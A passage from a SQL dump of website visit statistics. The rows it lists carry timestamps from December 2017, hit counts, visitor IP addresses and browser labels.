37.9.113.182','other'),(187021,1513334372,2,2,0,0,'213.180.203.8','other'),(187022,1513334607,3,3,0,0,'141.8.132.19','other'),(187023,1513334705,1,1,0,0,'141.8.142.74','other'),(187024,1513334774,3,3,0,0,'87.250.224.46','other'),(187025,1513334922,2,2,0,0,'178.154.171.88','other'),(187026,1513334954,1,1,0,0,'8.29.198.27','other'),(187027,1513335014,1,1,0,0,'5.45.207.83','other'),(187028,1513335040,1,1,0,0,'178.154.171.60','other'),(187029,1513335043,1,1,0,0,'178.154.171.4','other'),(187030,1513335106,1,1,0,0,'37.9.113.101','other'),(187031,1513335143,1,1,0,0,'37.52.18.138','chrome'),(187032,1513335607,1,1,0,0,'91.196.178.70','firefox'),(187033,1513335761,1,1,0,0,'207.244.157.138','chrome'),(187034,1513336363,1,1,0,0,'91.196.178.71','chrome'),(187035,1513336480,1,1,0,0,'91.196.178.165','chrome'),(187036,1513336533,1,1,0,0,'5.45.207.82','other'),(187037,1513336665,1,1,0,0,'188.166.86.10','chrome'),(187038,1513336679,2,2,0,0,'141.8.142.74','other'),(187039,1513337123,2,2,0,0,'178.154.171.88','other'),(187040,1513337352,1,0,1,0,'66.249.70.27',''),(187041,1513337726,1,0,1,0,'66.249.70.25',''),(187042,1513337896,1,1,0,0,'195.10.210.70','chrome'),(187043,1513338328,1,1,0,0,'141.8.132.19','other'),(187044,1513339105,1,1,0,0,'37.9.113.182','other'),(187045,1513339107,2,2,0,0,'178.154.171.88','other'),(187046,1513339158,2,2,0,0,'35.184.189.105','other'),(187047,1513339219,1,1,0,0,'37.9.113.110','other'),(187048,1513339479,1,0,1,0,'66.249.70.29',''),(187049,1513340022,1,1,0,0,'91.196.178.70','chrome'),(187050,1513340091,1,1,0,0,'91.196.178.163','chrome'),(187051,1513340540,1,1,0,0,'35.184.189.105','other'),(187052,1513341040,1,1,0,0,'162.210.196.97','other'),(187053,1513341474,1,0,1,0,'66.249.64.15',''),(187054,1513341624,1,0,1,0,'66.249.70.25',''),(187055,1513341698,1,1,0,0,'157.55.39.192','other'),(187056,1513341721,1,1,0,0,'141.8.142.74','other'),(187057,1513341781,2,2,0,0,'87.250.224.46','other'),(187058,1513341985,1,1,0,0,'78.111.185.232','chrome'),(187059,1513342442,4,4,0,0,'136.243.73.76','other'),(187060,1513342449,1,1,0,0,'178.154.171.88','other'),(187061,1513342572,1,1,0,0,'217.69.133.217','other'),(187062,1513342734,1,1,0,0,'91.196.177.46','other'),(187063,1513342778,1,0,1,0,'66.249.64.16',''),(187064,1513342789,1,1,0,0,'91.196.178.36','chrome'),(187065,1513342878,1,1,0,0,'87.250.224.46','other'),(187066,1513343713,1,1,0,0,'91.231.160.143','chrome'),(187067,1513344351,1,1,0,0,'217.69.133.190','other'),(187068,1513344357,2,1,1,0,'66.249.64.30',''),(187069,1513345416,1,0,1,0,'66.249.70.27',''),(187070,1513345727,2,2,0,0,'87.250.224.46','other'),(187071,1513345786,1,1,0,0,'8.29.198.26','other'),(187072,1513345984,1,1,0,0,'141.8.142.74','other'),(187073,1513346285,1,1,0,0,'91.196.177.46','other'),(187074,1513346305,1,1,0,0,'157.55.39.192','other'),(187075,1513346331,1,1,0,0,'91.196.177.46','chrome'),(187076,1513346667,1,1,0,0,'157.55.39.234','other'),(187077,1513347066,2,2,0,0,'37.9.113.182','other'),(187078,1513347078,1,1,0,0,'92.112.218.1','chrome'),(187079,1513347787,1,1,0,0,'178.154.171.88','other'),(187080,1513347861,1,1,0,0,'213.180.203.8','other'),(187081,1513348040,2,2,0,0,'37.9.113.182','other'),(187082,1513348084,1,1,0,0,'91.196.178.165','chrome'),(187083,1513348133,1,1,0,0,'35.184.189.105','other'),(187084,1513348841,1,1,0,0,'91.196.178.71','firefox'),(187085,1513348960,1,1,0,0,'178.154.171.88','other'),(187086,1513349214,1,1,0,0,'37.9.113.115','other'),(187087,1513349283,1,1,0,0,'87.250.224.46','other'),(187088,1513349628,2,2,0,0,'141.8.142.74','other'),(187089,1513350327,1,1,0,0,'178.154.171.88','other'),(187090,1513350981,1,1,0,0,'35.184.189.105','other'),(187091,1513351188,1,1,0,0,'46.161.9.39','firefox'),(187092,1513351507,1,1,0,0,'37.9.113.182','other'),(187093,1513351512,1,1,0,0,'141.8.142.74','other'),(187094,1513351990,1,0,1,0,'66.249.64.30',''),(187095,1513352562,1,1,0,0,'157.55.39.78','other'),(187096,1513352927,1,1,0,0,'141.8.142.74','other'),(187097,1513353015,2,2,0,0,'178.154.171.88','other'),(187098,1513353129,1,1,0,0,'217.69.133.190','other'),(187099,1513354186,1,1,0,0,'66.249.64.28','chrome'),(187100,1513354463,1,1,0,0,'178.154.171.88','other'),(187101,1513354771,1,1,0,0,'176.124.134.104','chrome'),(187102,1513354782,1,1,0,0,'91.196.178.6','chrome'),(187103,1513355523,1,1,0,0,'195.10.210.70','chrome'),(187104,1513355577,1,1,0,0,'87.250.224.46','other'),(187105,1513356313,1,0,1,0,'66.249.70.23',''),(187106,1513356616,1,1,0,0,'8.29.198.27','other'),(187107,1513356707,1,0,1,0,'66.249.64.28',''),(187108,1513357101,2,2,0,0,'91.196.178.165','chrome'),(187109,1513357432,1,1,0,0,'178.154.171.4','other'),(187110,1513357645,1,1,0,0,'141.8.132.19','other'),(187111,1513357743,1,1,0,0,'178.154.171.88','other'),(187112,1513357804,1,1,0,0,'157.55.39.78','other'),(187113,1513357885,1,1,0,0,'66.102.9.38','chrome'),(187114,1513357904,1,1,0,0,'66.102.9.35','chrome'),(187115,1513357938,1,1,0,0,'141.8.142.74','other'),(187116,1513358411,1,0,1,0,'66.249.64.29',''),(187117,1513358414,1,1,0,0,'91.196.178.134','chrome'),(187118,1513358557,1,1,0,0,'66.249.64.28','chrome'),(187119,1513358975,1,1,0,0,'35.184.189.105','other'),(187120,1513359188,1,1,0,0,'66.249.64.30','chrome'),(187121,1513359328,1,1,0,0,'37.9.113.182','other'),(187122,1513359381,1,1,0,0,'178.154.171.88','other'),(187123,1513359662,1,1,0,0,'87.250.224.46','other'),(187124,1513360288,1,1,0,0,'37.73.213.245','chrome'),(187125,1513360685,1,1,0,0,'188.163.16.6','chrome'),(187126,1513360738,1,1,0,0,'213.180.203.8','other'),(187127,1513361235,1,0,1,0,'68.180.229.52',''),(187128,1513361365,1,1,0,0,'87.250.224.46','other'),(187129,1513362015,2,2,0,0,'35.184.189.105','other'),(187130,1513362212,3,3,0,0,'141.8.142.74','other'),(187131,1513363739,1,1,0,0,'35.184.189.105','other'),(187132,1513363832,1,1,0,0,'213.180.203.7','other'),(187133,1513364201,1,1,0,0,'66.249.70.23','chrome'),(187134,1513365106,3,3,0,0,'141.8.142.74','other'),(187135,1513365227,1,0,1,0,'66.249.64.28',''),(187136,1513365501,1,1,0,0,'82.145.220.234','chrome'),(187137,1513365822,1,1,0,0,'91.196.178.133','chrome'),(187138,1513366107,5,5,0,0,'144.76.12.66','other'),(187139,1513366388,1,1,0,0,'178.154.171.10','other'),(187140,1513367451,1,1,0,0,'8.29.198.26','other'),(187141,1513368352,1,1,0,0,'178.154.171.88','other'),(187142,1513368664,1,0,1,0,'66.249.64.30',''),(187143,1513369020,1,0,1,0,'66.249.70.25',''),(187144,1513369126,1,1,0,0,'92.113.126.95','chrome'),(187145,1513370127,1,1,0,0,'92.113.126.95','chrome'),(187146,1513370308,1,0,1,0,'66.249.64.28',''),(187147,1513370401,1,1,0,0,'87.250.224.125','other'),(187148,1513370779,1,1,0,0,'178.154.200.7','other'),(187149,1513370836,1,1,0,0,'37.9.113.101','other'),(187150,1513370840,1,1,0,0,'87.250.224.96','other'),(187151,1513372201,1,1,0,0,'141.8.142.74','other'),(187152,1513372505,1,1,0,0,'141.8.132.19','other'),(187153,1513373308,1,1,0,0,'66.249.70.19','chrome'),(187154,1513373882,1,1,0,0,'178.154.171.88','other'),(187155,1513374106,2,2,0,0,'141.8.132.19','other'),(187156,1513374619,1,1,0,0,'213.180.203.40','other'),(187157,1513374853,1,0,1,0,'66.249.64.28',''),(187158,1513375161,1,1,0,0,'188.32.30.194','msie'),(187159,1513375192,1,1,0,0,'207.46.13.8','other'),(187160,1513375196,1,0,1,0,'66.249.70.25',''),(187161,1513375311,1,1,0,0,'157.55.39.234','other'),(187162,1513375378,1,1,0,0,'178.154.171.88','other'),(187163,1513375464,1,1,0,0,'37.9.113.114','other'),(187164,1513375592,1,1,0,0,'141.8.142.74','other'),(187165,1513375803,1,1,0,0,'188.163.16.6','chrome'),(187166,1513377626,1,0,1,0,'66.249.70.25',''),(187167,1513378286,1,1,0,0,'8.29.198.25','other'),(187168,1513378601,22,22,0,0,'5.9.63.162','other'),(187169,1513379991,1,1,0,0,'107.167.113.113','other'),(187170,1513381517,1,1,0,0,'178.140.124.234','chrome'),(187171,1513381749,1,0,1,0,'66.249.70.23',''),(187172,1513382328,1,1,0,0,'66.249.64.29','chrome'),(187173,1513387378,1,1,0,0,'220.181.132.177','chrome'),(187174,1513387405,1,1,0,0,'106.120.162.96','chrome'),(187175,1513387848,1,0,1,0,'66.249.64.28',''),(187176,1513388130,1,1,0,0,'66.249.64.28','chrome'),(187177,1513389116,1,1,0,0,'8.29.198.26','other'),(187178,1513389685,1,1,0,0,'66.249.64.30','chrome'),(187179,1513391006,1,1,0,0,'207.46.13.60','other'),(187180,1513394818,1,1,0,0,'66.249.64.29','chrome'),(187181,1513395447,1,0,1,0,'66.249.64.30',''),(187182,1513396125,1,1,0,0,'157.55.39.78','other'),(187183,1513397700,1,0,1,0,'66.249.64.30',''),(187184,1513398520,1,1,0,0,'157.55.39.78','other'),(187185,1513398689,1,0,1,0,'66.249.64.28',''),(187186,1513399941,1,1,0,0,'8.29.198.25','other'),(187187,1513401443,1,1,0,0,'92.113.126.95','chrome'),(187188,1513403329,1,1,0,0,'157.55.39.30','other'),(187189,1513404548,1,0,1,0,'66.249.64.29',''),(187190,1513404809,1,1,0,0,'94.178.107.243','chrome'),(187191,1513405505,1,1,0,0,'217.69.133.224','other'),(187192,1513405952,1,0,1,0,'66.249.64.28',''),(187193,1513406208,1,1,0,0,'157.55.39.225','other'),(187194,1513409087,1,0,1,0,'66.249.64.29',''),(187195,1513409388,1,1,0,0,'157.55.39.225','other'),(187196,1513409749,1,1,0,0,'66.249.64.29','chrome'),(187197,1513410562,1,1,0,0,'92.113.126.95','chrome'),(187198,1513410775,1,1,0,0,'8.29.198.27','other'),(187199,1513411277,1,1,0,0,'66.249.64.30','chrome'),(187200,1513411346,62,62,0,0,'62.210.157.95','other'),(187201,1513411554,1,1,0,0,'217.69.133.14','other'),(187202,1513412462,1,1,0,0,'91.196.178.52','chrome'),(187203,1513412674,1,1,0,0,'66.117.8.42','chrome'),(187204,1513413222,1,1,0,0,'91.196.178.167','chrome'),(187205,1513413581,1,1,0,0,'217.69.133.234','other'),(187206,1513413651,1,1,0,0,'91.196.178.52','chrome'),(187207,1513413830,1,1,0,0,'91.196.178.11','chrome'),(187208,1513413840,2,2,0,0,'92.222.180.240','other'),(187209,1513413863,9,9,0,0,'178.154.171.88','other'),(187210,1513413866,14,14,0,0,'141.8.142.74','other'),(187211,1513413948,1,1,0,0,'87.250.224.46','other'),(187212,1513415080,22,22,0,0,'62.210.157.129','other'),(187213,1513415314,2,2,0,0,'141.8.142.74','other'),(187214,1513415535,1,1,0,0,'91.196.178.167','chrome'),(187215,1513415657,1,1,0,0,'141.170.226.226','other'),(187216,1513415660,1,1,0,0,'188.32.189.118','msie'),(187217,1513415662,1,1,0,0,'95.24.4.177','msie'),(187218,1513415720,3,3,0,0,'178.154.171.88','other'),(187219,1513415783,1,1,0,0,'91.196.178.166','chrome'),(187220,1513415995,1,1,0,0,'91.196.178.103','firefox'),(187221,1513416112,1,0,1,0,'66.249.64.28',''),(187222,1513416628,1,1,0,0,'141.8.142.74','other'),(187223,1513416948,1,1,0,0,'95.132.9.159','chrome'),(187224,1513417172,1,1,0,0,'91.196.178.100','chrome'),(187225,1513417289,1,1,0,0,'178.154.171.88','other'),(187226,1513417707,1,0,1,0,'66.249.70.19',''),(187227,1513417787,1,1,0,0,'157.55.39.225','other'),(187228,1513417999,1,1,0,0,'213.108.45.66','chrome'),(187229,1513418183,1,1,0,0,'91.196.177.69','firefox'),(187230,1513418340,1,1,0,0,'91.196.178.51','chrome'),(187231,1513418360,1,1,0,0,'91.196.178.162','chrome'),(187232,1513418621,1,0,1,0,'66.249.70.25',''),(187233,1513418688,1,1,0,0,'91.196.178.97','chrome'),(187234,1513419067,1,1,0,0,'157.55.39.226','other'),(187235,1513419611,1,1,0,0,'217.69.134.185','other'),(187236,1513419683,1,0,1,0,'66.249.64.15',''),(187237,1513419887,1,1,0,0,'91.196.178.44','chrome'),(187238,1513419930,11,11,0,0,'141.8.142.74','other'),(187239,1513420006,8,8,0,0,'178.154.171.88','other'),(187240,1513420019,2,2,0,0,'87.250.224.46','other'),(187241,1513420202,1,1,0,0,'107.167.117.6','other'),(187242,1513421537,22,22,0,0,'107.150.37.99','other'),(187243,1513421606,1,1,0,0,'8.29.198.26','other'),(187244,1513421805,1,1,0,0,'141.8.142.74','other'),(187245,1513422010,2,2,0,0,'178.154.171.88','other'),(187246,1513422180,1,1,0,0,'95.134.96.250','chrome'),(187247,1513422651,1,1,0,0,'66.117.8.42','chrome'),(187248,1513423844,1,1,0,0,'178.154.171.88','other'),(187249,1513424244,1,1,0,0,'40.77.167.56','other'),(187250,1513424688,1,1,0,0,'178.93.193.121','chrome'),(187251,1513425784,1,1,0,0,'66.249.70.19','chrome'),(187252,1513425835,1,1,0,0,'207.46.13.8','other'),(187253,1513426059,1,0,1,0,'66.249.64.15',''),(187254,1513427574,1,1,0,0,'141.8.142.74','other'),(187255,1513427632,1,1,0,0,'92.113.126.95','chrome'),(187256,1513429460,1,1,0,0,'37.52.19.219','chrome'),(187257,1513429908,1,1,0,0,'66.249.70.23','chrome'),(187258,1513430021,1,0,1,0,'66.249.64.28',''),(187259,1513432438,1,1,0,0,'8.29.198.25','other'),(187260,1513432847,1,1,0,0,'157.55.39.237','other'),(187261,1513434410,1,1,0,0,'180.76.15.29','other'),(187262,1513434437,1,0,1,0,'66.249.64.30',''),(187263,1513434576,1,1,0,0,'51.255.71.122','other'),(187264,1513434917,1,1,0,0,'137.74.207.102','other'),(187265,1513435118,1,1,0,0,'37.52.115.96','firefox'),(187266,1513435396,1,1,0,0,'37.190.163.241','chrome'),(187267,1513435457,1,1,0,0,'91.196.178.102','chrome'),(187268,1513435863,1,1,0,0,'40.77.167.189','other'),(187269,1513435940,1,1,0,0,'157.55.39.38','other'),(187270,1513436607,1,1,0,0,'51.255.71.121','other'),(187271,1513436842,1,1,0,0,'94.179.144.85','chrome'),(187272,1513436843,1,1,0,0,'91.209.11.236','other'),(187273,1513436852,1,1,0,0,'66.102.9.40','chrome'),(187274,1513436925,1,1,0,0,'137.74.207.188','other'),(187275,1513437095,1,1,0,0,'51.255.71.112','other'),(187276,1513437164,1,1,0,0,'66.102.9.35','chrome'),(187277,1513437367,1,0,1,0,'66.249.70.19',''),(187278,1513437519,1,1,0,0,'66.102.9.38','chrome'),(187279,1513437571,1,1,0,0,'199.58.86.209','other'),(187280,1513438027,1,1,0,0,'92.113.175.67','other'),(187281,1513438170,1,1,0,0,'137.74.207.109','other'),(187282,1513438583,1,1,0,0,'91.196.178.6','chrome'),(187283,1513439528,1,1,0,0,'178.154.171.88','other'),(187284,1513439610,1,1,0,0,'141.8.142.74','other'),(187285,1513439627,1,1,0,0,'77.37.221.119','chrome'),(187286,1513439629,1,1,0,0,'188.255.91.119','firefox'),(187287,1513439776,1,1,0,0,'107.167.107.16','other'),(187288,1513440237,1,1,0,0,'128.69.211.127','msie'),(187289,1513440578,1,0,1,0,'66.249.64.30',''),(187290,1513440581,1,1,0,0,'141.8.142.74','other'),(187291,1513440780,1,1,0,0,'137.74.201.108','other'),(187292,1513440849,1,1,0,0,'217.69.133.241','other'),(187293,1513440990,1,1,0,0,'178.92.249.198','chrome'),(187294,1513441012,1,1,0,0,'31.13.106.116','other'),(187295,1513441573,1,1,0,0,'91.196.178.7','chrome'),(187296,1513441797,1,1,0,0,'178.154.171.88','other'),(187297,1513443272,1,1,0,0,'8.29.198.26','other'),(187298,1513443687,1,0,1,0,'66.249.64.30',''),(187299,1513443695,1,1,0,0,'51.255.71.122','other'),(187300,1513443845,1,1,0,0,'91.196.178.65','other'),(187301,1513443935,2,2,0,0,'178.154.171.88','other'),(187302,1513444089,1,1,0,0,'195.54.42.17','chrome'),(187303,1513444092,3,3,0,0,'141.8.142.74','other'),(187304,1513444227,1,1,0,0,'51.255.71.123','other'),(187305,1513444416,1,1,0,0,'157.55.39.38','other'),(187306,1513444574,1,1,0,0,'77.111.244.6','chrome'),(187307,1513445062,1,1,0,0,'91.196.178.129','chrome'),(187308,1513445097,1,0,1,0,'66.249.70.19',''),(187309,1513446946,1,1,0,0,'40.77.167.9','other'),(187310,1513447913,1,1,0,0,'37.9.113.138','other'),(187311,1513447916,1,1,0,0,'37.9.113.60','other'),(187312,1513448166,1,1,0,0,'217.69.133.18','other'),(187313,1513448268,1,1,0,0,'213.180.203.40','other'),(187314,1513448731,1,1,0,0,'164.132.162.164','other'),(187315,1513448953,1,0,1,0,'66.249.64.29',''),(187316,1513449168,1,1,0,0,'91.196.176.13','chrome'),(187317,1513449782,1,1,0,0,'51.255.71.131','other'),(187318,1513450631,1,1,0,0,'207.46.13.115','other'),(187319,1513450632,2,2,0,0,'87.250.224.46','other'),(187320,1513451269,1,1,0,0,'91.196.178.67','chrome'),(187321,1513451292,1,1,0,0,'141.8.142.74','other'),(187322,1513451411,14,14,0,0,'46.4.91.109','other'),(187323,1513451958,1,1,0,0,'164.132.162.187','other'),(187324,1513452008,1,1,0,0,'40.77.167.10','other'),(187325,1513452252,1,1,0,0,'79.164.128.156','msie'),(187326,1513452332,1,0,1,0,'66.249.64.30',''),(187327,1513452353,1,1,0,0,'46.200.103.97','chrome'),(187328,1513452429,1,1,0,0,'94.178.244.24','chrome'),(187329,1513452609,1,1,0,0,'66.249.64.29','chrome'),(187330,1513452919,1,1,0,0,'92.113.126.95','chrome'),(187331,1513452946,1,1,0,0,'141.8.142.74','other'),(187332,1513452996,1,1,0,0,'178.154.171.88','other'),(187333,1513453672,1,1,0,0,'91.196.178.103','chrome'),(187334,1513454034,1,1,0,0,'40.77.167.9','other'),(187335,1513454112,1,1,0,0,'8.29.198.26','other'),(187336,1513454549,1,1,0,0,'164.132.162.188','other'),(187337,1513454675,1,1,0,0,'95.132.96.76','firefox'),(187338,1513454997,3,3,0,0,'141.8.142.74','other'),(187339,1513455127,1,1,0,0,'46.101.230.81','other'),(187340,1513455261,1,1,0,0,'37.73.193.202','chrome'),(187341,1513455414,1,1,0,0,'51.255.71.132','other'),(187342,1513455484,1,1,0,0,'37.73.200.87','chrome'),(187343,1513455699,1,1,0,0,'77.111.244.55','chrome'),(187344,1513455838,1,1,0,0,'95.132.96.76','firefox'),(187345,1513456032,1,1,0,0,'141.8.142.74','other'),(187346,1513456132,1,0,1,0,'66.249.70.25',''),(187347,1513456726,1,1,0,0,'77.111.244.55','chrome'),(187348,1513457170,1,0,1,0,'66.249.64.28',''),(187349,1513458104,1,1,0,0,'91.124.4.162','chrome'),(187350,1513458404,22,22,0,0,'88.99.19.242','other'),(187351,1513459065,1,1,0,0,'92.112.248.11','chrome'),(187352,1513459365,1,1,0,0,'88.99.19.242','other'),(187353,1513459718,1,1,0,0,'178.92.8.158','firefox'),(187354,1513460131,1,1,0,0,'87.250.224.46','other'),(187355,1513460614,1,1,0,0,'91.196.178.68','chrome'),(187356,1513460651,4,4,0,0,'212.83.182.255','chrome'),(187357,1513461007,1,1,0,0,'157.55.39.189','other'),(187358,1513461101,1,1,0,0,'178.154.171.88','other'),(187359,1513461574,1,1,0,0,'217.69.133.231','other'),(187360,1513461740,1,1,0,0,'164.132.162.159','other'),(187361,1513461836,1,1,0,0,'91.196.178.68','chrome'),(187362,1513462026,1,1,0,0,'40.77.167.9','other'),(187363,1513462719,24,24,0,0,'178.151.245.174','other'),(187364,1513463298,1,1,0,0,'137.74.207.116','other'),(187365,1513463918,30,30,0,0,'141.8.142.74','other'),(187366,1513463932,2,2,0,0,'178.154.171.88','other'),(187367,1513463997,1,1,0,0,'37.9.113.101','other'),(187368,1513464016,1,1,0,0,'141.8.132.19','other'),(187369,1513464706,1,1,0,0,'40.77.167.134','other'),(187370,1513464810,1,1,0,0,'137.74.207.170','other'),(187371,1513464948,1,1,0,0,'8.29.198.26','other'),(187372,1513464961,1,1,0,0,'51.255.71.126','other'),(187373,1513467090,1,1,0,0,'178.154.171.88','other'),(187374,1513467495,1,1,0,0,'217.69.136.203','other'),(187375,1513468141,1,1,0,0,'91.196.178.166','chrome'),(187376,1513468265,1,1,0,0,'91.196.178.167','chrome'),(187377,1513468336,1,1,0,0,'87.250.224.46','other'),(187378,1513468919,2,2,0,0,'178.154.171.88','other'),(187379,1513469954,1,1,0,0,'46.161.9.39','chrome'),(187380,1513470353,1,1,0,0,'54.165.59.7','other'),(187381,1513470537,1,1,0,0,'178.154.171.88','other'),(187382,1513471739,1,1,0,0,'178.154.171.88','other'),(187383,1513471844,1,1,0,0,'87.250.224.46','other'),(187384,1513472475,1,1,0,0,'51.255.71.127','other'),(187385,1513473343,1,1,0,0,'213.179.252.39','firefox'),(187386,1513474495,1,1,0,0,'137.74.207.188','other'),(187387,1513474858,2,2,0,0,'178.154.171.88','other'),(187388,1513475467,1,1,0,0,'176.109.202.237','firefox'),(187389,1513475788,1,1,0,0,'8.29.198.25','other'),(187390,1513476681,1,1,0,0,'137.74.207.108','other'),(187391,1513476837,1,1,0,0,'213.180.203.7','other'),(187392,1513476966,1,1,0,0,'164.132.162.156','other'),(187393,1513477438,1,1,0,0,'137.74.207.120','other'),(187394,1513477691,1,1,0,0,'217.69.133.240','other'),(187395,1513478296,2,2,0,0,'141.8.142.74','other'),(187396,1513478486,95,95,0,0,'54.227.51.103','other'),(187397,1513478583,1,1,0,0,'178.154.171.88','other'),(187398,1513479055,1,0,1,0,'66.249.64.28',''),(187399,1513480283,1,1,0,0,'178.154.171.88','other'),(187400,1513481034,1,1,0,0,'51.255.71.115','other'),(187401,1513482087,2,2,0,0,'141.8.142.74','other'),(187402,1513482155,1,1,0,0,'137.74.207.119','other'),(187403,1513482420,1,1,0,0,'66.249.70.23','chrome'),(187404,1513482651,1,1,0,0,'178.154.171.88','other'),(187405,1513483343,1,1,0,0,'164.132.162.156','other'),(187406,1513483898,1,1,0,0,'137.74.207.101','other'),(187407,1513484188,1,1,0,0,'137.74.207.110','other'),(187408,1513484276,1,1,0,0,'164.132.162.155','other'),(187409,1513484918,1,0,1,0,'66.249.64.30',''),(187410,1513485026,3,3,0,0,'141.8.142.74','other'),(187411,1513485911,2,2,0,0,'164.132.162.154','other'),(187412,1513486025,1,1,0,0,'188.32.246.128','msie'),(187413,1513486034,2,2,0,0,'178.154.171.88','other'),(187414,1513486617,1,1,0,0,'8.29.198.26','other'),(187415,1513487416,2,2,0,0,'141.8.142.74','other'),(187416,1513488014,1,1,0,0,'178.154.171.88','other'),(187417,1513488064,1,0,1,0,'66.249.70.25',''),(187418,1513488157,1,1,0,0,'51.255.71.111','other'),(187419,1513489161,1,1,0,0,'137.74.201.108','other'),(187420,1513489171,1,1,0,0,'13.56.229.65','chrome'),(187421,1513489225,1,1,0,0,'178.154.171.88','other'),(187422,1513490109,1,1,0,0,'51.255.71.122','other'),(187423,1513490193,2,2,0,0,'141.8.142.74','other'),(187424,1513490445,1,0,1,0,'66.249.70.19',''),(187425,1513490582,1,0,1,0,'66.249.64.29',''),(187426,1513490677,1,0,1,0,'66.249.70.25',''),(187427,1513490781,1,1,0,0,'178.154.171.88','other'),(187428,1513490939,1,0,1,0,'66.249.64.28',''),(187429,1513491257,1,1,0,0,'66.249.64.28','chrome'),(187430,1513491313,1,1,0,0,'141.8.142.74','other'),(187431,1513493015,1,1,0,0,'157.55.39.139','other'),(187432,1513493365,1,1,0,0,'137.74.201.100','other'),(187433,1513493667,1,1,0,0,'207.46.13.56','other'),(187434,1513494008,1,1,0,0,'164.132.164.180','other'),(187435,1513494053,1,1,0,0,'137.74.207.102','other'),(187436,1513494293,1,1,0,0,'176.31.231.10','other'),(187437,1513494629,1,1,0,0,'109.194.87.169','chrome'),(187438,1513495450,1,1,0,0,'141.8.142.74','other'),(187439,1513496052,1,1,0,0,'35.225.221.87','other'),(187440,1513497008,1,1,0,0,'51.255.71.133','other'),(187441,1513497108,1,1,0,0,'137.74.207.109','other'),(187442,1513497447,1,1,0,0,'8.29.198.26','other'),(187443,1513497674,1,1,0,0,'141.8.142.74','other'),(187444,1513497817,1,1,0,0,'87.250.224.46','other'),(187445,1513497842,1,1,0,0,'51.255.71.127','other'),(187446,1513497889,1,1,0,0,'151.80.27.118','other'),(187447,1513497921,1,1,0,0,'35.225.221.87','other'),(187448,1513498512,1,0,1,0,'66.249.64.29',''),(187449,1513498645,1,1,0,0,'51.255.71.122','other'),(187450,1513498721,1,1,0,0,'91.196.178.131','chrome'),(187451,1513499305,1,1,0,0,'35.225.221.87','other'),(187452,1513501745,1,1,0,0,'178.154.171.88','other'),(187453,1513502143,1,1,0,0,'51.255.71.127','other'),(187454,1513502225,1,1,0,0,'51.255.71.100','other'),(187455,1513502637,1,1,0,0,'87.250.224.46','other'),(187456,1513502764,1,1,0,0,'51.255.71.111','other'),(187457,1513503410,1,1,0,0,'141.8.142.74','other'),(187458,1513504101,1,1,0,0,'178.92.139.134','firefox'),(187459,1513504333,1,1,0,0,'37.9.113.182','other'),(187460,1513504352,1,1,0,0,'137.74.201.99','other'),(187461,1513504664,1,1,0,0,'51.255.71.122','other'),(187462,1513504789,1,0,1,0,'66.249.64.17',''),(187463,1513505682,1,1,0,0,'164.132.162.156','other'),(187464,1513506341,1,1,0,0,'178.154.171.88','other'),(187465,1513507131,1,1,0,0,'51.255.71.125','other'),(187466,1513507199,1,1,0,0,'40.77.167.197','other'),(187467,1513507513,1,1,0,0,'87.250.224.46','other'),(187468,1513507635,2,2,0,0,'164.132.162.153','other'),(187469,1513508080,15,15,0,0,'5.189.160.96','other'),(187470,1513508275,1,1,0,0,'8.29.198.27','other'),(187471,1513509709,1,1,0,0,'207.46.13.56','other'),(187472,1513510307,2,2,0,0,'141.8.142.74','other'),(187473,1513510445,1,1,0,0,'87.250.224.46','other'),(187474,1513510470,1,1,0,0,'178.154.171.88','other'),(187475,1513510596,1,1,0,0,'92.113.126.95','chrome'),(187476,1513511277,1,1,0,0,'66.249.64.30','chrome'),(187477,1513512280,1,1,0,0,'109.251.183.88','other'),(187478,1513513228,1,1,0,0,'35.225.221.87','other'),(187479,1513513665,20,20,0,0,'141.8.142.74','other'),(187480,1513513668,7,7,0,0,'178.154.171.88','other'),(187481,1513513738,1,1,0,0,'141.8.132.19','other'),(187482,1513513788,1,1,0,0,'87.250.224.46','other'),(187483,1513514089,1,0,1,0,'66.249.70.23',''),(187484,1513514716,1,1,0,0,'164.132.162.153','other'),(187485,1513514820,1,1,0,0,'162.210.196.130','other'),(187486,1513514892,1,1,0,0,'51.255.71.118','other'),(187487,1513515146,1,1,0,0,'37.73.244.49','chrome'),(187488,1513517501,2,2,0,0,'157.55.39.77','other'),(187489,1513519101,1,1,0,0,'8.29.198.25','other'),(187490,1513519128,1,1,0,0,'92.113.126.95','chrome'),(187491,1513519349,2,2,0,0,'137.74.207.109','other'),(187492,1513519459,1,1,0,0,'178.151.218.33','chrome'),(187493,1513519940,1,1,0,0,'137.74.207.161','other'),(187494,1513519991,1,1,0,0,'91.196.177.96','chrome'),(187495,1513520101,1,1,0,0,'46.164.131.162','firefox'),(187496,1513521050,1,1,0,0,'141.8.142.74','other'),(187497,1513521297,1,1,0,0,'51.255.71.120','other'),(187498,1513521665,1,1,0,0,'91.196.178.161','chrome'),(187499,1513521676,1,0,1,0,'68.180.229.52',''),(187500,1513521739,1,1,0,0,'193.194.127.223','chrome'),(187501,1513522530,1,1,0,0,'137.74.207.119','other'),(187502,1513522738,1,1,0,0,'91.211.132.53','chrome'),(187503,1513522769,1,1,0,0,'51.255.71.126','other'),(187504,1513523453,1,1,0,0,'51.255.71.127','other'),(187505,1513523933,1,1,0,0,'51.255.71.133','other'),(187506,1513525193,1,0,1,0,'66.249.64.28',''),(187507,1513525359,1,1,0,0,'78.111.185.168','chrome'),(187508,1513525858,1,1,0,0,'87.240.13.106','chrome'),(187509,1513526060,1,1,0,0,'66.249.64.30','chrome'),(187510,1513526174,1,0,1,0,'66.249.70.3',''),(187511,1513526549,1,1,0,0,'91.196.178.166','chrome'),(187512,1513526683,2,2,0,0,'178.154.171.88','other'),(187513,1513527020,1,1,0,0,'91.196.178.103','chrome'),(187514,1513527768,1,1,0,0,'178.93.148.57','chrome'),(187515,1513527893,1,1,0,0,'77.111.246.14','chrome'),(187516,1513527939,1,1,0,0,'91.196.178.129','chrome'),(187517,1513529154,2,2,0,0,'141.8.142.74','other'),(187518,1513529405,1,1,0,0,'95.132.52.92','chrome'),(187519,1513529791,1,1,0,0,'51.255.71.112','other'),(187520,1513529931,1,1,0,0,'8.29.198.26','other'),(187521,1513530489,1,1,0,0,'91.196.178.68','chrome'),(187522,1513532528,1,1,0,0,'95.132.134.104','firefox'),(187523,1513532725,1,1,0,0,'46.211.99.192','chrome'),(187524,1513532827,1,1,0,0,'91.196.178.66','chrome'),(187525,1513533219,1,1,0,0,'35.225.221.87','other'),(187526,1513533440,1,0,1,0,'66.249.70.13',''),(187527,1513534331,1,1,0,0,'178.94.172.127','chrome'),(187528,1513534372,1,1,0,0,'51.255.71.117','other'),(187529,1513535046,1,1,0,0,'94.130.168.232','fir